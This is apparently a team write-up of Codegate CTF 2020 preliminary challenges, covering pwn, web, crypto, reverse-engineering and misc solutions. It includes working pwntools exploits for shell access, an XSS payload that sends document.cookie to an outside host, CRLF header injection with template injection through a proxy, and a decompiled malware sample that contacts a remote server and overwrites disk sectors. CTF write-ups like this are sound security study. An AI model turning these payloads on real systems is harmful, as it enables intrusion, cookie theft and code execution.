Codegate CTF 2020 Preliminary
Pwn
Babyllvm
When rel_pos == 0, is_safe always return True. We can modify data_ptr in one block and read/write in another block to bypass bounding check getting arbitrary read/write. Leak libc address and hijack GOT to control PC and get shell.
from pwn import *
#r = remote("localhost",4444)
r = remote("58.229.240.181", 7777)
payload = ",[]<<<<<<<<[-]<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<.>.>.>.>.>.>.>.>,>,>,>,>,>,>,>,>"
r.sendlineafter(">>>",payload)
r.recvrepeat(1)
r.send("\x00")
libc = u64(r.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x110070
print hex(libc)
r.send(p64(libc+0x10a38c))
r.sendlineafter(">>>","<-")
r.interactive()
Web
CSP
The objective is to steal admin's cookie. We are given the source code:
<!DOCTYPE html>
<html>
<head>
<title>Advanced Echo Service</title>
</head>
<body>
<!-- TODO: implement form to support multiple APIs in same time -->
<form action="view.php" method="GET">
<p>API Name (Required): </p>
<input name="name" type="text" required />
<p>API Param#1 (Optional) : </p>
<input name="p1" type="text" />
<p>API Param#2 (Optional) : </p>
<input name="p2" type="text" />
<button type="submit">Submit</button>
</form>
<br />
<p>
If you find a bug, please <a href="/report.php">report</a>!
</p>
</body>
</html>
<?php
require_once 'config.php';
if(!isset($_GET["q"]) || !isset($_GET["sig"])) {
die("?");
}
$api_string = base64_decode($_GET["q"]);
$sig = $_GET["sig"];
if(md5($salt.$api_string) !== $sig){
die("??");
}
//APIs Format : name(b64),p1(b64),p2(b64)|name(b64),p1(b64),p2(b64) ...
$apis = explode("|", $api_string);
foreach($apis as $s) {
$info = explode(",", $s);
if(count($info) != 3)
continue;
$n = base64_decode($info[0]);
$p1 = base64_decode($info[1]);
$p2 = base64_decode($info[2]);
if ($n === "header") {
if(strlen($p1) > 10)
continue;
if(strpos($p1.$p2, ":") !== false || strpos($p1.$p2, "-") !== false) //Don't trick...
continue;
header("$p1: $p2");
}
elseif ($n === "cookie") {
setcookie($p1, $p2);
}
elseif ($n === "body") {
if(preg_match("/<.*>/", $p1))
continue;
echo $p1;
echo "\n<br />\n";
}
elseif ($n === "hello") {
echo "Hello, World!\n";
}
}
Also, the CSP default-src 'self'; script-src 'none'; base-uri 'none';
is very strict. It's too difficult to execute javascript with that constraint. Therefore, the idea here is to abuse header
or setcookie
to somehow strip out this CSP.
But header
here has some limitations: the key length and some chacracter like :-
are not allowed. It's too hard to do any tricks here.
Let's check header()'s doc first.
There are two special-case header calls. The first is a header that starts with the string "HTTP/" (case is not significant), which will be used to figure out the HTTP status code to send....
That is cool, so we can probably manipulate the response code. After a few tries, we accidently found some status code (103, 123, 300 ...) will lead to no CSP at all. This is due to nginx's behavior. You can see read our discussion here on twitter. The community is just amazing!
Next, we have to bypass the preg_match("/<.*>/", $p1)
filter. This one is simple as we can inject newline before the >
.
The last one is the md5 length extension attack. Since the API only provides signature for one single command, we have to extend it to two commands (header and body). The part is done by @nkhg :)
Here is the full payload. I don't know why fetch
won't work in remote headless Chrome, so I use <img>
instead.
#!/usr/bin/env python3
import requests, hashlib, re, base64
import base64
import hashpumpy
def b64e(s):
return base64.b64encode(s.encode()).decode()
def b64d(s):
return base64.b64decode(s.encode())
s = requests.session()
target = '|' + ','.join([
b64e('header'),
b64e('HTTP/1.1'),
b64e('300'),
]) + '|' + ','.join([
b64e('body'),
b64e('<img id="img"\n></img\n><script\n>document.getElementById("img").src="//255.255.255.255:13337/?"+document.cookie;</script\n>'),
b64e('dontCare')
])
tmp = target.encode('ascii')
print(tmp)
for i in range(12, 13):
#r = hashpumpy.hashpump('f43646db31566ccb3f624f46aac80b53', ',,YQ==', tmp, i)
r = hashpumpy.hashpump('7f104404b0d414d18ab3efb831e333d7', ',,', tmp, i)
t = base64.b64encode(r[1])
#print(t)
#print(i, r)
p = s.get('http://110.10.147.166/api.php', params=dict(sig=r[0], q=t))
print(p.url)
if p.content != b'??':
print('solved!')
print(t, r[0])
print(p.status_code)
for k, v in p.headers.items():
print(k, ':', v)
print(p.content)
break
Train of Thought
- Find out the most exploitable path here:
setcookie
andheader
to strip out CSP. - Know that the
header
can be used to control HTTP status code by reading the document. - Do some random testing (fuzzing) to see if we can manipulate the headers.
Failed Attempts
- CRLF injection:
header
seems to be vulnerable to this in 2002. In the latest PHP, bothsetbookie
andheader
will filter out invalid characters. - Bypass PHP length check and
strpos
: I can't come out with an approach to bypass that. - DNS rebinding: Not useful when dealing with cookies because of the incorrect domains.
renderer
In this challenge we only have the Dockerfile. Those python and shell script are not included in the given source code.
FROM python:2.7.16
ENV FLAG CODEGATE2020{**DELETED**}
RUN apt-get update
RUN apt-get install -y nginx
RUN pip install flask uwsgi
ADD prob_src/src /home/src
ADD settings/nginx-flask.conf /tmp/nginx-flask.conf
ADD prob_src/static /home/static
RUN chmod 777 /home/static
RUN mkdir /home/tickets
RUN chmod 777 /home/tickets
ADD settings/run.sh /home/run.sh
RUN chmod +x /home/run.sh
ADD settings/cleaner.sh /home/cleaner.sh
RUN chmod +x /home/cleaner.sh
CMD ["/bin/bash", "/home/run.sh"]
So we need to do some obnoxious black-box tricks here :/
The server is a proxy service with Python-urllib/2.7
, based on Flask + uswgi. The can issue GET
reuqest to an arbitrary endpoint. After some black-box fuzzing, we found an endpoint route http://127.0.0.1/renderer/admin
. There is a link on that admin page /static/img/admin.jpg
.
However, visiting the link will get a 404 not found by nginx. This is kind of strange because by default /static
should be handle by Flask itself.
And there is a nginx path traversal bug, which allows us to get the source of the remote server. For this bug you can read this article (in English) or this one (in Simplified Chinese). This bug requires some guessing in my opinion, so if you fail to do this, don't blame yourself. The author should attach the nginx config file in the given source code, rather than asking challenger to guess something here.
It's worth to mention that this is probaby the 5th of 6th times I encounter this bug in 2019 and 2020's CTF ......
We have the full sourcde code by inferring the filepath from the uswgi.ini
and run.py
:
from flask import Flask, render_template, render_template_string, request, redirect, abort, Blueprint
import urllib2
import time
import hashlib
from os import path
from urlparse import urlparse
front = Blueprint("renderer", __name__)
@front.before_request
def test():
print(request.url)
@front.route("/", methods=["GET", "POST"])
def index():
if request.method == "GET":
return render_template("index.html")
url = request.form.get("url")
res = proxy_read(url) if url else False
if not res:
abort(400)
return render_template("index.html", data = res)
@front.route("/whatismyip", methods=["GET"])
def ipcheck():
return render_template("ip.html", ip = get_ip(), real_ip = get_real_ip())
@front.route("/admin", methods=["GET"])
def admin_access():
ip = get_ip()
rip = get_real_ip()
if ip not in ["127.0.0.1", "127.0.0.2"]: #super private ip :)
abort(403)
if ip != rip: #if use proxy
ticket = write_log(rip)
return render_template("admin_remote.html", ticket = ticket)
else:
if ip == "127.0.0.2" and request.args.get("body"):
ticket = write_extend_log(rip, request.args.get("body"))
return render_template("admin_local.html", ticket = ticket)
else:
return render_template("admin_local.html", ticket = None)
@front.route("/admin/ticket", methods=["GET"])
def admin_ticket():
ip = get_ip()
rip = get_real_ip()
if ip != rip: #proxy doesn't allow to show ticket
print 1
abort(403)
if ip not in ["127.0.0.1", "127.0.0.2"]: #only local
print 2
abort(403)
if request.headers.get("User-Agent") != "AdminBrowser/1.337":
print request.headers.get("User-Agent")
abort(403)
if request.args.get("ticket"):
log = read_log(request.args.get("ticket"))
if not log:
print 4
abort(403)
return render_template_string(log)
def get_ip():
return request.remote_addr
def get_real_ip():
return request.headers.get("X-Forwarded-For") or get_ip()
def proxy_read(url):
#TODO : implement logging
s = urlparse(url).scheme
if s not in ["http", "https"]: #sjgdmfRk akfRk
return ""
return urllib2.urlopen(url).read()
def write_log(rip):
tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
with open("/home/tickets/%s" % tid, "w") as f:
log_str = "Admin page accessed from %s" % rip
f.write(log_str)
return tid
def write_extend_log(rip, body):
tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
with open("/home/tickets/%s" % tid, "w") as f:
f.write(body)
return tid
def read_log(ticket):
if not (ticket and ticket.isalnum()):
return False
if path.exists("/home/tickets/%s" % ticket):
with open("/home/tickets/%s" % ticket, "r") as f:
return f.read()
else:
return False
I don't know what write_extend_log
, 127.0.0.2
, admin_local
are used for. Anyway:
- The objective is
render_template_string
to RCE / readconfig
because the flag is inconfig
get_real_ip
will get the IP address from a user-controlled HTTP headerX-Forwarded-For
- Accourding to
Dockerfile
, this python urllib is vulnerable to CRLF injection.
The first renderer/admin
should be easy to do. The real problem is the second user-agent
one, because urllib2
will also append its user-agent
in the HTTP header. I was trying to inject \r\n\r\n
to make the header become part of the HTTP body part, but nginx considers that's an invalid request and thus reply with HTTP 400.
After more fuzzing, I found HTTP version is somehow related to this behavior. Injecting \r\n\r\n
in HTTP/1.1 does not work for me, however to my surprise, HTTP/1.0 seems to work well here. The reason seems to be related to the Host:
header. In order to make it work in HTTP/1.1, you need to inject Host: 127.0.0.1\r\n
. I don't know if the root cause is RFC or nginx. Please let me know by creating a GitHub issue if you have anything in your mind. with HTTP/1.1. Not really sure how nginx parses these chaotic headers.
Btw, HTTP version trick also appears in Plaid CTF 2019.
Here is my final payload:
#!/usr/bin/env python3
import requests
import re
s = requests.session()
url = 'http://127.0.0.1/renderer/admin HTTP/1.1\r\nX-Forwarded-For:{{config}}YOLOzzw\r\n'
r = s.post('http://58.229.253.144/renderer/', data=dict(url=url))
print(r.text)
tid = re.findall('([0-9a-f]{40})', r.text)[0]
url = f'http://127.0.0.1/renderer/admin/ticket?ticket={tid} HTTP/1.0\r\nUser-agent: AdminBrowser/1.337\r\n\r\nA:'
r = s.post('http://58.229.253.144/renderer/', data=dict(url=url))
print(r.text, r.status_code)
Train of Thought
- Guessing the nginx path traversal trick to retrieve the source code
- Find out the Python version is vulnerable to HTTP header injection by virtual of CRLF injection
Crypto
Halffeed
pt = b'\x00'*11 + b';cat ' + b'a'*16
ct1, _ = get_enc(pt)
t1 = sxor(ct1[16:], pt[16:])
pt = b'flag;' + b'd'*11
t2, ct2 = feed_plus(t1, pt)
pt = b'b'*16 + b'e'*16
ct, _ = get_enc(pt)
t3 = sxor(ct[16:], pt[16:])
pt = b'b'*16 + sxor(t2[:8], t3[:8]) + b'd'*8
_, tag = get_enc(pt)
ct = ct1[:16] + ct2
do_exec(0, ct, tag)
# CODEGATE2020{F33D1NG_0N1Y_H4LF_BL0CK_W1TH_BL0CK_C1PH3R}
Munch
In this task, We have an encrypted flag with RSA and some info about one of its prime p
:
- The prime
p
is split into 7 parts:- [74bits] [35bits] [111bits] [35bits] [111bits] [35bits] [111bits]
- Remove those 35bits parts
- We can get 52bits of MSBs of
y = part[i] * seed**(16 * k) mod m
, where k starts from 0 to 50, and we know what the seed is.
We can reconstruct those parts with LLL algorithm. Consider following matrix:
M = [diag(seed^(16*k)) diag(y<<shift) I m*I]
we know that:
M * [part[i] -1 truncated_LSBs modulo_parts] = 0
And we can find that vector by finding reduction basis on the right kernel of M.
After we got those bits of prime p, we can reconstruct those missing 35bit parts using multivariate coppersmith.
Polynomial
The encryption algorithm is NTRU, and we can find some attacks of insecure parameters from its original paper. The weaker one can be solved by applying LLL on public key to find private key, but it doesn't work on the stronger one. To solve both of them, I use another attack by ciphertext to recover plaintext directly. Consider the following lattice:
H = Matrix(ZZ, h.matrix())
C = Matrix(ZZ, [outputs.list()])
I, O = identity_matrix, zero_matrix
nr, nc = H.nrows(), H.ncols()
L = Matrix.block([
[a * I(nr, nc), H ],
[ O(nr, nc), q * I(nr, nc)],
[ O(1, nc), C ],
])
(ar, m)
is in the lattice, and we can find it with LLL algorithm.
Misc
Verifier
i = 0;
j = 0;
ans = 3;
[ i < 10 { j = j + 1 ; j > 6 ? { ans = ans - 1 ; i = i + 1 } : { i = i + 1 } } ];
!ans
Rev
ORM-APP
Reverse the emulator
We have a binary of emulator and a special ISA binary. The code structure of emulator is quite simple. It just need a lot of human effort to figure out the definition of opcodes.
__int64 __fastcall main(__int64 a1, char **argv, char **a3)
{
task cpu; // [rsp+10h] [rbp-40h]
unsigned __int64 v5; // [rsp+48h] [rbp-8h]
v5 = __readfsqword(0x28u);
if ( (signed int)a1 <= 1 )
usage((__int64)*argv);
unbuffering();
load(argv[1], &cpu);
if ( !cpu.bin_info )
{
fwrite("fatal: fail to initialize ORM.\n", 1uLL, 0x1FuLL, stderr);
exit(-1);
}
run_emu(&cpu);
return 0LL;
}
void __fastcall run_emu(task *cpu)
{
while ( !(unsigned int)run(cpu) )
;
switch ( -cpu->errno )
{
case 0:
fwrite("ORM halted.\n", 1uLL, 0xCuLL, stderr);
exit(0);
return;
case 1:
fwrite("Invalid opcode.\n", 1uLL, 0x10uLL, stderr);
break;
case 2:
fwrite("Segmentation fault.\n", 1uLL, 0x14uLL, stderr);
break;
case 3:
fwrite("Invalid State.\n", 1uLL, 0xFuLL, stderr);
break;
case 4:
fwrite("Device error.\n", 1uLL, 0xEuLL, stderr);
break;
}
exit(-1);
}
__int64 __fastcall run(task *cpu)
{
int v1; // eax
unsigned __int8 opcode; // [rsp+1Fh] [rbp-1h]
opcode = get_data(cpu);
v1 = cpu->x64_x32;
if ( v1 == 4 )
return operation_32[opcode >> 3](cpu, (opcode >> 2) & 1, opcode & 3);
if ( v1 == 8 )
return operation_64[opcode >> 3](cpu, (opcode >> 2) & 1, opcode & 3);
cpu->errno = -3;
return 1LL;
}
.data:0000000000213120 ; __int64 (__fastcall *operation_64[32])(task *task, char flag, unsigned __int8 a3)
.data:0000000000213120 operation_64 dq offset nop ; DATA XREF: run+89↑o
.data:0000000000213120 ; run+90↑r
.data:0000000000213120 dq offset push
.data:0000000000213120 dq offset pop
.data:0000000000213120 dq offset neg
.data:0000000000213120 dq offset add
.data:0000000000213120 dq offset sub
.data:0000000000213120 dq offset mul
.data:0000000000213120 dq offset div
.data:0000000000213120 dq offset mod
.data:0000000000213120 dq offset unsign_rshift
.data:0000000000213120 dq offset sign_rshift
.data:0000000000213120 dq offset lshift
.data:0000000000213120 dq offset and
.data:0000000000213120 dq offset or
.data:0000000000213120 dq offset xor
.data:0000000000213120 dq offset equl
.data:0000000000213120 dq offset nequl
.data:0000000000213120 dq offset unsign_b
.data:0000000000213120 dq offset unsign_beq
.data:0000000000213120 dq offset sign_b
.data:0000000000213120 dq offset sign_beq
.data:0000000000213120 dq offset jmp
.data:0000000000213120 dq offset jz
.data:0000000000213120 dq offset jnz
.data:0000000000213120 dq offset set_adr
.data:0000000000213120 dq offset sub_E298
.data:0000000000213120 dq offset call
.data:0000000000213120 dq offset write_mem
.data:0000000000213120 dq offset write_reg
.data:0000000000213120 dq offset read_mem
.data:0000000000213120 dq offset set_err
.data:0000000000213120 dq offset set_err
Exploit the program
After we get the definition of opcodes, we write a loader and processor module to reverse the challenge program in IDA. The disassembler is far from perfect, but we can guess about what the program wants to do from its structure.
It's main function is quite simple, it is just a switch on input and call corresponding routine based on our input:
First of all, Let's find where the flag-related parts are:
SEG3:90909090909091A8 aMigratingCenso:db "[+] Migrating ====== CENSORED: FLAG LOCATED HERE. ======"
write(1, aMigratingCenso, 0xE);
The length specified won't print the flag out in normal case, so we need to find some vulnerability to leak that memory.
The first bug we found is from add
routine:
It won't check about how many projects is created, and it will overflow:
The memory layout looks like:
SEG4:A0A0A0A0A0A0A000 ; Segment type: Pure data
SEG4:A0A0A0A0A0A0A000 input: dq 0 ; DATA XREF: show+2E↑r
SEG4:A0A0A0A0A0A0A000 ; show+49↑r ...
SEG4:A0A0A0A0A0A0A008 align 0x1000
SEG4:A0A0A0A0A0A0B000 project_count: dq 0 ; DATA XREF: get_project+4↑r
SEG4:A0A0A0A0A0A0B000 ; add+1↑r ...
SEG4:A0A0A0A0A0A0B008 projects: dq 8 dup(0) ; DATA XREF: get_project+1A↑r
SEG4:A0A0A0A0A0A0B008 ; add+26↑r ...
SEG4:A0A0A0A0A0A0B048 data: dq 0 ; DATA XREF: add+3B↑r
SEG4:A0A0A0A0A0A0B048 ; migrate+D9↑r
SEG4:A0A0A0A0A0A0B050 align 0x1000
SEG4:A0A0A0A0A0A0B050 ; end of 'SEG4'
SEG4:A0A0A0A0A0A0B050
projects
is a pointer array points to its corresponding data. And data is an array of following structure:
char name[8];
char description[0x80];
uint64_t is_migrated;
So after overflow, the name of first project will be overwritten we some address, and it makes the string longer because the null byte is overwritten.
The second bug we found is that the program will segfault when we call migrate on overflowed project. We tried to hook on the emulator to figure out which instruction causing the segfault. Surprisingly, the reason is that program counter is in non executable data segment.
We find the root cause is strcpy
in migrate
which overflow the stack.
Now, the path to our flag is clear: change the return address to flag printing gadget and win :)
here is the exploit:
from pwn import *
p = remote("110.10.147.39",31337)
def Add(name, des):
p.sendafter(b">>> ",b'A')
p.sendafter(b"):", name)
p.sendafter(b"):", des)
Add(b'0',p64(0x80808080808084B6))
for _ in range(7):
Add(b'0',b'trash')
p.sendafter(b">>> ",b'M')
p.sendafter(b":",b'0')
p.sendafter(b":","trash")
flag = p.recvuntil(b"\x00")
print(flag)
malicious
Looks very simple, the function at 0x403ED2
is useless, patch it.
And the function at 0x403f8c
connect to an HTTP server on 195.157.15.100:818 to ask for a token, the token would be used as the first argument to call md5 function, which's not just a hash function, it would also affect the result of the shellcode in the next step. The md5 result should be d4ee0fbbeb7ffd4fd7a7d477a7ecd922
which is the md5 result of activate
.
Then in the function at 0x403DB1
, it would decrypt the shellcode which was encrypted by camellia or something, that's not important, the result only affect by the token in the last step.
int sub_403F8C()
{
struct sockaddr name; // [esp+18h] [ebp-1B0h]
struct WSAData WSAData; // [esp+28h] [ebp-1A0h]
void *Buf1; // [esp+1B8h] [ebp-10h]
SOCKET s; // [esp+1BCh] [ebp-Ch]
WSAStartup(0x202u, &WSAData);
s = socket(2, 1, 0);
memset(&name, 0, 0x10u);
name.sa_family = 2;
*(_DWORD *)&name.sa_data[2] = inet_addr("195.157.15.100");
*(_WORD *)name.sa_data = htons(0x332Cu);
if ( connect(s, &name, 16) )
return 0;
send(s, "GET /status HTTP/1.1\r\n", 22, 0);
recv(s, token, 8, 0);
Buf1 = md5(token, 8u);
return memcmp(Buf1, &md5_hash, 0x10u);
}
The decrypted shellcode is an MBR (the program base is 0x7c00
), it would copy itself to 0x600
, decrypt itself by xor 0xF4
, then jump to the 0x630
.
Then the MBR use BIOS interrupt call 0x1A to get the current time, the value of cx:dx
looks like 0x2020:0x0208
, the MBR check the year should be greater or equal to 0x30
or it would print out Not a chance
.
After that check, there is a loop :
for di in range(0xdead):
for si in range(0xbeef):
write sectors [1:32] on disk to memory 0x1000
concat sector [0] on disk after that (0x5000, a sector is 0x200)
overwrite the sectors[0:32] on disk with memory start from 0x1000
extract the bytes of flag on each sector and print out
Illustrate the sectors after each loop:
#1
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0]
#2
[2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0, 1]
#3
[3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0, 1, 2]
Modifying the di
as 1 and si
as (0xdead*0xbeef)%33
then we get the flag:
CODEGATE2020{8_bits_per_byte_1_byte_per_sector}